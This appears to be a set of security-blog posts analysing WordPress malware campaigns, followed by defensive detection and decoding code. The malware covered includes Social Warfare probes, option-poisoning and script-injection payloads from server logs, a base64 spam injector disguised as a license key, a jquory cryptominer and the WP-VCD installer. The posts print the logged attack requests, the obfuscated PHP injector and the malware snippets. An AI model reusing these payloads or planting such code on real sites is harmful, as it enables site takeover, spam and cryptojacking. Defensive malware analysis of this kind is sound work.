Social Warfare Vulnerability Probes

After the recent disclosure of the Social Warfare plugin vulnerability, we’ve seen massive attacks that inject malicious JavaScript into the plugin options.

The vulnerability has been patched in version 3.5.3 of the plugin, so not every site with the plugin is still vulnerable. To find the sites that actually are, hackers scan the Internet and probe them. However, instead of pointing the vulnerable endpoint at a file whose code actually changes the settings, they specify a file with PHP code that simply returns a predefined text on vulnerable sites.

Here are some of the URLs of such probe files detected by our firewall:

hxxp://thehuglaw[.]com/cache/wq.txt
hxxp://www.fdqyj[.]com/lang/wp2.txt
hxxp://www.fdqyj[.]com/lang/wp3.txt
hxxp://kidsinthehouse[.]com/all-backup/libraries/share/fonts/tresz.txt
hxxp://kidsinthehouse[.]com/all-backup/libraries/share/fonts/551.txt
hxxps://gist.githubusercontent.com/kolzdnoy71/ef026d1b2587371fdc6b28a9a21249dd/raw/628d8b376d2122580d6fcbc63c41ea9778473b8f/gistfile1.txt
...

They have very simple PHP code inside <pre> tags. For example:

<pre>print(7457737+736723);</pre>

Or

<pre>system('echo dfdffg34dfg')</pre>

Some of these files are hosted on compromised third-party sites and, at this point, some of them have already been removed.

Hacked sites are not the only option used by the attackers. We’ve seen them using Pastebin links (Pastebin removes them after abuse reports). Another option, which you can see in the list above, is GitHub, and specifically its Gist service.

In the case of the above Gist link, the user who created it (kolzdnoy71) joined GitHub only on March 27, 2019.

Super Amazon Banners plugin gone rogue

During a recent investigation we found the plugin Super Amazon Banners to be serving malware/spam via the domain seoranker[.]info. We suspect that the domain expired and was registered by somebody else who is using it to serve the malware now.

The plugin loads this JavaScript, which tries to open a popup (popupHtml) containing many spam links to external sites. It also appears to cause loading issues; some pages refuse to load at all:

(function() {'use strict'; if (window['shbNetLoaded']) return;window['shbNetLoaded'] = true;var popupHtml =

Here is a screenshot of the code the plugin is trying to load:

The issue was reported to WordPress, the plugin was closed, and it can no longer be downloaded. We recommend removing the plugin from your WordPress site if you are using it.

Multi-Vector Attack in Server Logs

We recently noticed an increase in suspicious requests in our logs that reveals a planned attack against the Social Warfare plugin. The bad actors added this brand-new exploit to an existing campaign that already targets other vulnerable plugins and themes to inject malicious scripts.


Plugins and themes under attack

Some of the Payloads Used by Bots

WordPress GDPR Compliance

145.239.54.77 - action=wpgdprc_process_action&data=%7B%22type%22%3A%22save_setting%22%2C%22append%22%3Afalse%2C%22option%22%3A%22siteurl%22%2C%22value%22+%3A%22https%3A%2F%2Fverybeatifulpear .com%2Fjava.js%3Ft%3D2%26%22%7D&security= [Date] "POST /wp-admin/admin-ajax.php HTTP/1.1"

Newspaper WP Theme

31.208.43.209 - action=td_ajax_update_panel&wp_option%5Bhome%5D=https%3A%2F%2Fredrentalservice .com [Date] "POST /wp-admin/admin-ajax.php HTTP/1.1"

Social Warfare Plugin

91.134.215.233 - - [Date] "GET /wp-admin/admin-post.php?swp_debug=load_options&swp_url=hxxp://109.234 .34 .22/mv.txt HTTP/1.1"

Smart Google Code Inserter

1.208.43.209 - action=savegooglecode&sgcgoogleanalytic=%3Cscript+language%3Djavascript%3Eeval%28String.fromCharCode%28118%2C+97%2C+114%2C+32%2C+97%2C+32%2C+61%2C+32%2C+34%2C+104%2C+116%2C+116%2C+112%2C+115%2C+58%2C+47%2C+47%2C+114%2C+101%2C+100%2C+...skipped...+111%2C+119%2C+46%2C+108%2C+111%2C+99%2C+97%2C+116%2C+105%2C+111%2C+110%2C+46%2C+104%2C+114%2C+101%2C+102%2C+61%2C+97%2C+59%29%29%3B%3C%2Fscript%3E&sgcwebtools= [Date] "POST /wp-admin/admin-ajax.php HTTP/1.1"

The injected code redirects to hxxps://redrentalservice[.]com/?t4

Education WP Theme

34.194.221.173 - action=thim_update_theme_mods&thim_key=thim_google_analytics&thim_value=X%3C%2Fscript%3E%3Cscript+language%3Djavascript%3Eeval%28String.fromCharCode%28118%2C+97%2C+114%2C+32%2C+97%2C+32%2C+61%2C+32%2C+34%2C+104%2C+116%2C+116%2C+112%2C+115%2C+58%2C+47%2C+47%2C+114%2C+101%2C+100%2C+114%2C+101%2C+110%2C+116%2C+97%2C+108%2C+115%2C+101%2C+114%2C+118%2C+105%2C+99%2C+101%2C+46%2C+99%2C+111%2C+109%2C+47%2C+63%2C+116%2C+52%2C...skipped...97%2C+59%2C+32%2C+119%2C+105%2C+110%2C+100%2C+111%2C+119%2C+46%2C+108%2C+111%2C+99%2C+97%2C+116%2C+105%2C+111%2C+110%2C+46%2C+104%2C+114%2C+101%2C+102%2C+61%2C+97%2C+59%29%29%3B%3C%2Fscript%3E%3Cscript%3E "POST /wp-admin/admin-ajax.php
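The requests above share one shape: an unauthenticated call to admin-ajax.php or admin-post.php whose parameters write an attacker URL or script into a WordPress option. The following detection logic is an added example, not code from the original post; it parses log lines in the format shown above, merges query and POST parameters, and flags the Social Warfare swp_url probe as well as the option-poisoning actions of the other plugins and themes listed. The sample log lines, the 203.0.113.x addresses and example.invalid are constructed placeholders.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Added example, not from the original post. The admin-ajax.php actions and
# parameters the campaign above abuses to store attacker URLs/scripts in options.
WATCHED = {
    "wpgdprc_process_action": ("data",),
    "td_ajax_update_panel": ("wp_option[home]", "wp_option[siteurl]"),
    "savegooglecode": ("sgcgoogleanalytic",),
    "thim_update_theme_mods": ("thim_value",),
}
SUSPECT = re.compile(r"https?://|<script|String\.fromCharCode|eval\(", re.I)
# Log shape used on this page: <ip> - <POST body or -> [Date] "<METHOD> <target> ..."
LOG_RE = re.compile(r'^(\S+) - (\S+) \[[^\]]*\] "\S+ (\S+) ')

def classify(line):
    """Return a list of findings for one log line (empty when it looks benign)."""
    m = LOG_RE.match(line)
    if not m:
        return []
    ip, body, target = m.groups()
    url = urlsplit(target)
    params = parse_qs(url.query, keep_blank_values=True)
    if body != "-":
        params.update(parse_qs(body, keep_blank_values=True))
    findings = []
    # Social Warfare probe/exploit: swp_debug=load_options with a remote swp_url.
    if url.path.endswith("/admin-post.php") and "load_options" in params.get("swp_debug", []):
        for remote in params.get("swp_url", []):
            findings.append(f"{ip} social-warfare swp_url={remote}")
    # Option-poisoning actions of the other plugins/themes in the campaign.
    action = params.get("action", [""])[0]
    for key in WATCHED.get(action, ()):
        for value in params.get(key, []):
            if SUSPECT.search(value):
                findings.append(f"{ip} {action} {key}={value[:60]}")
    return findings

def scan(lines):
    """classify() every line and flatten the findings."""
    return [f for line in lines for f in classify(line)]

# Constructed sample lines in the same shape (203.0.113.x and example.invalid are
# documentation placeholders, not real indicators).
SAMPLE_LOG = [
    '203.0.113.5 - action=wpgdprc_process_action&data=%7B%22type%22%3A%22save_setting%22%2C%22option%22%3A%22siteurl%22%2C%22value%22%3A%22https%3A%2F%2Fexample.invalid%2Fjava.js%22%7D&security= [Date] "POST /wp-admin/admin-ajax.php HTTP/1.1"',
    '203.0.113.6 - action=td_ajax_update_panel&wp_option%5Bhome%5D=https%3A%2F%2Fexample.invalid [Date] "POST /wp-admin/admin-ajax.php HTTP/1.1"',
    '203.0.113.7 - - [Date] "GET /wp-admin/admin-post.php?swp_debug=load_options&swp_url=http://example.invalid/mv.txt HTTP/1.1"',
    '203.0.113.8 - action=savegooglecode&sgcgoogleanalytic=%3Cscript%3Eeval%28String.fromCharCode%28118%29%29%3C%2Fscript%3E [Date] "POST /wp-admin/admin-ajax.php HTTP/1.1"',
    '203.0.113.9 - action=heartbeat&data=ok [Date] "POST /wp-admin/admin-ajax.php HTTP/1.1"',
]
```

Running scan(SAMPLE_LOG) flags the first four lines and leaves the benign heartbeat request alone.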

Malicious Domains and IPs:

IPs:

31.208.43.209
91.134.215.233
34.194.221.173
128.199.114.0
162.243.1.231
145.239.54.77
185.136.85.47
222.73.242.180
109.234.34.22

URLs:

hxxps://redrentalservice[.]com/tpn1.js
hxxp://raiserate[.]com/mv.txt
hxxp://109.234 .34 .22/mv.txt
hxxps://verybeatifulpear[.]com
hxxps://blueeyeswebsite[.]com
hxxp://r-y-p[.]org/options.txt
hxxps://teutorrent.com/wp-includes/js/javascript-mini.js

Spam Injector Disguised as a License Key

A client reported some weird spam URLs injected on their WordPress website and after an investigation, it turned out that the hacker was hiding the encoded spam injector malware in the following theme file:

./wp-content/themes/toolbox/functions.php

The hacker formatted the encoded injector to look like a theme’s license key, hoping that anyone reviewing the file would not suspect this code and find the malware:

/**
 * Theme personal token soft descriptor.
 */
function theme_personal_token() {
    // Your personal token key #00118
    $token = <<<KEY
eyJsaWNlbnNlIjoiY3JlYXRlX2Z1bmN0aW9uIiwiYWNjb3VudCI6IiR4IiwidGhlbWUiOiJldmFs
KFwiPz5cIi5nemluZmxhdGUoYmFzZTY0X2RlY29kZSgkeCkpKTsiLCJ1cGRhdGUiOiJiWkY3YzZK
SUZNV1wvaXV0UWcxYXlHdkU5eG14RUVCXC9CRnhBbGxrVzEwa2hMODdDN0llcVE3NzQ0czdzMTJk
MFwvNzdtbjd2MmRleFwvXC9pTndveFwvbmRJdzBEeTRiNzBJYUZ3eFVGRGdZTUZuYUF3a2J0YjUz
...
ZlBsemhjNHZNNXlpNFlkdk5SU0JGRFlmQU43R2lJWXdZN0dEcnMyK1wvdGRyc1ZuVHY1cDh3UFN2
eGpHVHp4blkrUFhcL1phODVtbWJcL2lJM3hhXC9mdjFISEl4ZVpHMlRkXC9MYlRUNEFQc3h2XC94
MUU2eTlIY1wvMkhjZHBUNVN3TTUzUnRSRzd1Mnd0S3Ywd3VcL2RcL0FUaGJzczg3OHlQcXJsd0Ur
STJyRkVRNkJEVzNMUVRpYmlqT0laejlNNEg4YTk1eFQ3RHl6TUw1ZHpybVwvcVQ1RFAwbUtXZUNQ
UHdFPSJ9
KEY;
    if( $token = json_decode( base64_decode( $token ), true ) ) {
        $token['license'] = $token['license']( $token['account'], $token['theme'] );
        $token['license']( $token['update'] );
    }
}
add_action( 'wp_footer', 'theme_personal_token' );

The injected code contained a few layers of encoding to further obfuscate it from detection, but we can begin by decoding the base64-encoded text within the $token variable:

{"license":"create_function","account":"$x","theme":"eval(\"?>\".gzinflate(base64_decode($x)));","update":"bZF7c6JIFMW\/iutQg1ayGvE9xmxEEB\/BFxAllkW10khL87C7IeqQ7744s7s12d0\/77mn7v2dex\/\/iNwox\/ndIw0Dy4b70IaFwxUFDgYMFnaAwkbtb53Hry+7HVUP0lx4nagtPB4IRHPoKhp5WgUfpso0WEwmpNG8zDzQjNv6UDhLZ+iY1VmtIpPVsG43kDR8d+vjiUJG7eVUqRwNJYjkPdbvjn2g...skipped...\/LbTT4APsxv\/x1E6y9Hc\/2HcdpT5SwM53RtRG7u2wtKv0wu\/d\/AThbss878yPqrlwE+I2rFEQ6BDW3LQTibijOIZz9M4H8a95xT7DyzML5dzrm\/qT5DP0mKWeCPPwE="}

As shown by the above decoded content, we can see that the hacker is still trying to disguise the malware as a type of licensing key for a theme.

The decoded code also contains a conditional if statement that checks the user agent: the spam URLs are shown to every user agent and search engine except the ones listed below. This hides them from some web-based link-analyzing tools, whose cached results might otherwise alert the site owner:

if(!preg_match('#ia_archiver|Baidu|MJ12|Ezooms|Solomono|roger|Linkpad|Semrush|prodvigator|Survey|Alexi|Xenu|Ahrefs|serpstat|Yandex#i', $k)

The final decoded payload with hidden links as it would appear within the HTML source:

<a href="hxxps://credit-10[.]com/no/komplett-bank-logg-inn/" style="position:absolute;left:-9998px;">komplett bank min side</a>
<a href="hxxp://emporium[.]com.ua/answear" style="position:absolute;left:-9998px;">промокод ансвер</a>
<a href="hxxps://evehealth[.]ru/promokody/shops/promokody-onetwotrip" style="position:absolute;left:-9998px;">onetwotrip промокод</a>
<a href="hxxps://promocodius[.]com/us/shops/iherb" style="position:absolute;left:-9998px;">iherb coupon</a>

The links are hard-coded inside this malware, but on different sites they may be different. The domains of the spammy sites remain mostly the same though.
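The layers described above (base64 → JSON → create_function with gzinflate(base64_decode($x)) → off-screen links) can be peeled back statically, without letting any of the recovered PHP run. The decoder below is an added example and not the post's own tooling; PHP's gzinflate() is raw DEFLATE, which Python's zlib undoes with wbits=-15. Because the page's "update" blob is truncated, build_sample_token() constructs a token in the same layout (example.invalid is a placeholder domain).

```python
import base64
import json
import re
import zlib

# Added example, not the post's own code: a static decoder for the "license key"
# injector. Nothing recovered here is evaluated; each layer is only decoded.

def decode_token(heredoc):
    """Stage 1: the KEY heredoc is base64 of a JSON object with the fields seen above."""
    return json.loads(base64.b64decode("".join(heredoc.split())))

def is_injector(token):
    """Stage 2 pattern: create_function($x, 'eval(... gzinflate(base64_decode($x)))')."""
    return (token.get("license") == "create_function"
            and "gzinflate(base64_decode" in token.get("theme", ""))

def unpack_update(token):
    """Stage 3: apply base64_decode + gzinflate (raw DEFLATE) to the 'update' blob."""
    return zlib.decompress(base64.b64decode(token["update"]), -15).decode("utf-8", "replace")

def hidden_links(php_source):
    """Hrefs of anchors pushed off-screen with left:-9998px, as in the final payload."""
    return re.findall(r'<a href="([^"]+)" style="position:absolute;left:-9998px;">', php_source)

def build_sample_token():
    """Constructed sample token in the same layout as the one on the page."""
    payload = ("<?php $k = $_SERVER['HTTP_USER_AGENT'];\n"
               "if(!preg_match('#ia_archiver|Semrush|Ahrefs#i', $k)) {\n"
               "echo '<a href=\"https://example.invalid/promo\" "
               "style=\"position:absolute;left:-9998px;\">sample</a>';\n}")
    deflater = zlib.compressobj(9, zlib.DEFLATED, -15)       # raw DEFLATE like gzdeflate()
    update = base64.b64encode(deflater.compress(payload.encode()) + deflater.flush()).decode()
    token = {"license": "create_function", "account": "$x",
             "theme": "eval(\"?>\".gzinflate(base64_decode($x)));", "update": update}
    b64 = base64.b64encode(json.dumps(token, separators=(",", ":")).encode()).decode()
    # Wrap at 76 columns like the original heredoc so decode_token() sees the same shape.
    return "\n".join(b64[i:i + 76] for i in range(0, len(b64), 76))
```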

Let us know if you see or suspect any weird behavior on your website and we will be happy to investigate and clean it for you.

Side Effects of the Site_url Hack

We’ve been cleaning many sites infected by the so-called site_url hack, the result of the WP GDPR Compliance plugin vulnerability. The sites are broken because their static resource links point to some third-party site. However, this is not the only issue.

If a user starts to make changes in their WordPress settings, or some plugin regularly updates them, chances are the changes will be affected by the new value of the site_url option. In such cases, you’ll have to search the whole WordPress database (or at least the wp_options table) and the files on the server for the rogue site_url value in order to revert the changes.

For example, this is what your site’s .htaccess file may end up looking like after this hack:

# MediaAce Rules - Hotlink protection
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteCond %{REQUEST_URI} !/wp-content/plugins/media-ace/assets/hotlink-placeholder.png$
RewriteCond %{HTTP_REFERER} !^$
RewriteCond %{HTTP_REFERER} !^(http(s)?://)?(www\.)?wtools.io/code/raw/so? [NC]
RewriteCond %{HTTP_REFERER} !^(http(s)?://)?(www\.)?facebook\.com [NC]
RewriteCond %{HTTP_REFERER} !^(http(s)?://)?(www\.)?google\.*$/.* [NC]
RewriteCond %{HTTP_REFERER} !^(http(s)?://)?(www\.)?pinterest\.*$/.* [NC]
RewriteRule \.(jpg|jpeg|png|gif)$ hxxp://wtools[.]io/code/raw/so?/wp-content/plugins/media-ace/assets/hotlink-placeholder.png [NC,R,L]
</IfModule>

<IfModule mod_rewrite.c>
RewriteEngine On
RewriteBase /code/raw/so/
RewriteRule ^index\.php$ - [L]
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule . /code/raw/so/index.php [L]
</IfModule>

# END WordPress

As you can guess, in this case the hackers changed the site_url to hxxp://wtools[.]io/code/raw/so?, so both the media-ace plugin rules and the main WordPress rewrite rules were corrupted.

JQuory: Cryptomining in Nulled Themes and Plugins

Three months ago @ninoseki revealed a group of sites with cryptomining scripts inside jquory.js files (yes, jquory instead of jquery).


The attack uses the “I2OG8vGGXjF7wMQgL37BhqG5aVPjcoQL” CoinHive key, takes up 70% of processor time, doesn’t mine on mobile devices and, for some reason, uses the didOptOut function despite the fact that it relies on the coinhive[.]com/lib/coinhive.min.js, which doesn’t involve any opt-out screens.

At the time, PublicWWW had indexed 458 such sites.

That Twitter thread speculated that nulled themes were to blame. Actually, it’s not only nulled themes; nulled WordPress plugins also come with this jquory cryptominer. Below is what a typical injection in a nulled theme/plugin looks like:

function enqueue_my_scripts() {
  wp_enqueue_script( 'wp-internal', 'https://coinhive[.]com/lib/coinhive.min.js', false, false, true );
  wp_enqueue_script( 'wp-backend', plugins_url() . '/essential-grid/assets/js/jquory.js', false, false, true );
}

As of the beginning of June 2018, we already see 1300 sites with this malicious assets/js/jquory.js script. The “I2OG8vGGXjF7wMQgL37BhqG5aVPjcoQL” site key is still valid and continues to mine Monero.

Nulled software has long been known for coming with undisclosed malicious content such as backdoors, unwanted ads, web spam and now cryptominers. Please stay away from pirated themes and plugins if you care about the security and reputation of your websites.

WP-VCD Malware Comes with Nulled Themes

Recently we wrote about wp-vcd malware that created rogue WordPress admin users (100010010) and injected spam links.

Our readers noticed that the “nulled” premium theme sites promoted by the injected links (and some other similar sites) had this very wp-vcd malware pre-installed with every downloaded theme.

It’s pretty easy to notice when you check the files inside the downloaded .zip files. All original files have one date, but two files have a different, more recent date:


12914 Dec  4 09:25 functions.php
33045 Nov 30 09:33 class.theme-modules.php

And if you check those files, you’ll notice that functions.php has this line of code at the top:

<?php if (file_exists(dirname(__FILE__) . '/class.theme-modules.php')) include_once(dirname(__FILE__) . '/class.theme-modules.php'); ?>

And class.theme-modules.php (the file included by the code added to functions.php) is the file that installs the wp-vcd malware into the theme and creates the rest of the malicious files.

The beginning of the file looks like this:

<?php //install_code1
error_reporting(0);
ini_set('display_errors', 0);
DEFINE('MAX_LEVEL', 2);
DEFINE('MAX_ITERATION', 50);
DEFINE('P', $_SERVER['DOCUMENT_ROOT']);
$GLOBALS['WP_CD_CODE'] = 'PD9waHANCmVycm9y...long base64-encoded string here followed by installation code...
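Both indicators described above (two files with timestamps that differ from the rest of the archive, and the include_once line at the top of functions.php pulling in class.theme-modules.php) can be checked before a downloaded theme is ever installed. The checker below is an added example, not code from the original post; build_sample_zip() constructs an in-memory theme archive reproducing that layout with a placeholder instead of the real base64 blob.

```python
import io
import re
import zipfile
from collections import Counter

# Added example, not from the original post. The include line WP-VCD adds to
# functions.php, and markers from the top of class.theme-modules.php shown above.
INCLUDE_RE = re.compile(r"include_once\s*\(\s*dirname\s*\(\s*__FILE__\s*\)\s*\.\s*'/class\.theme-modules\.php'")
INSTALLER_MARKERS = ("WP_CD_CODE", "install_code", "MAX_ITERATION")

def inspect_theme_zip(zip_bytes):
    """Return the two indicators for a theme .zip given as bytes."""
    report = {"odd_dates": [], "vcd_include": False, "installer": []}
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        infos = [i for i in zf.infolist() if not i.is_dir()]
        # Nulled themes keep the vendor's timestamps; the injected files carry newer ones.
        common_day = Counter(i.date_time[:3] for i in infos).most_common(1)[0][0]
        for info in infos:
            if info.date_time[:3] != common_day:
                report["odd_dates"].append(info.filename)
            head = zf.read(info).decode("utf-8", "replace")[:4000]
            if info.filename.endswith("functions.php") and INCLUDE_RE.search(head):
                report["vcd_include"] = True
            if any(marker in head for marker in INSTALLER_MARKERS):
                report["installer"].append(info.filename)
    return report

def build_sample_zip():
    """Constructed theme archive reproducing the layout described on this page."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        clean = (2017, 6, 1, 12, 0, 0)
        for name, body in (("style.css", "/* Theme Name: Sample */"),
                           ("index.php", "<?php get_header();"),
                           ("header.php", "<!doctype html>")):
            zf.writestr(zipfile.ZipInfo("sample/" + name, clean), body)
        zf.writestr(zipfile.ZipInfo("sample/functions.php", (2017, 12, 4, 9, 25, 0)),
                    "<?php if (file_exists(dirname(__FILE__) . '/class.theme-modules.php')) "
                    "include_once(dirname(__FILE__) . '/class.theme-modules.php'); ?>\n"
                    "<?php /* original theme code follows */")
        zf.writestr(zipfile.ZipInfo("sample/class.theme-modules.php", (2017, 11, 30, 9, 33, 0)),
                    "<?php //install_code1\nerror_reporting(0);\nDEFINE('MAX_ITERATION', 50);\n"
                    "$GLOBALS['WP_CD_CODE'] = 'PLACEHOLDER_BASE64';")
    return buf.getvalue()
```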

Providing “nulled” content with backdoors, spam and other types of malware is typical for sites that offer premium software “for free”. We warned against using nulled themes and plugins many times.

Cleaning sites with such malware may not be that easy, as it downloads and installs more malware as soon as you begin using the contaminated theme or plugin. And the backdoor it creates allows the bad guys to do almost anything with your site. That’s why a thorough site analysis and cleanup is required. Let us know if you need our help.